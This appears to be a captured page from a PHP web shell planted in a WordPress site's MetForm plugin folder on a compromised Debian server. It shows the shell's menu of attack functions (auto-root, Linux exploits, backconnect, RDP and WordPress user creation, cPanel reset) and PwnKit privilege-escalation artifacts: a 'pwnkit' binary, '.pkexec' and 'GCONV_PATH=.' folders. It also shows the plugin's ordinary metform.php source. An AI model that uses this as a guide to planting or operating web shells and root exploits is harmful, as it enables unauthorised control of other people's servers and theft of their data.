Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 52.14.213.73
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ilpnowa /
web /
wp-content /
plugins /
metform /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
base
[ DIR ]
drwxr-xr-x
controls
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
traits
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
autoloader.php
1.41
KB
-rw-r--r--
metform.php
1.54
KB
-rw-r--r--
phpcs.xml
3.76
KB
-rw-r--r--
plugin.php
22.78
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.txt
41.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : metform.php
<?php /** * Plugin Name: MetForm * Plugin URI: http://products.wpmet.com/metform/ * Description: Most flexible and design friendly form builder for Elementor * Version: 3.2.4 * Author: Wpmet * Author URI: https://wpmet.com * Text Domain: metform * Domain Path: /languages * License: GPL-2.0+ * License URI: http://www.gnu.org/licenses/gpl-2.0.txt */ defined( 'ABSPATH' ) || exit; require_once plugin_dir_path( __FILE__ ) . 'utils/notice/notice.php'; require_once plugin_dir_path( __FILE__ ) . 'utils/banner/banner.php'; require_once plugin_dir_path( __FILE__ ) . 'utils/stories/stories.php'; require_once plugin_dir_path( __FILE__ ) . 'utils/pro-awareness/pro-awareness.php'; require_once plugin_dir_path( __FILE__ ) . 'utils/rating/rating.php'; require plugin_dir_path( __FILE__ ) .'autoloader.php'; require plugin_dir_path( __FILE__ ) .'plugin.php'; // init notice class \Oxaim\Libs\Notice::init(); // \Wpmet\Rating\Rating::init(); \Wpmet\Libs\Pro_Awareness::init(); register_activation_hook( __FILE__, [ MetForm\Plugin::instance(), 'flush_rewrites'] ); add_action( 'plugins_loaded', function(){ do_action('metform/before_load'); MetForm\Plugin::instance()->init(); do_action('metform/after_load'); }, 111); // Added Date: 20/07/2022 add_action('plugins_loaded', function(){ if(class_exists('MetForm_Pro\Core\Integrations\Crm\Hubspot\Integration')){ return; } require trailingslashit(plugin_dir_path(__FILE__)) . "core/integrations/crm/hubspot/loader.php"; }, 222);
Close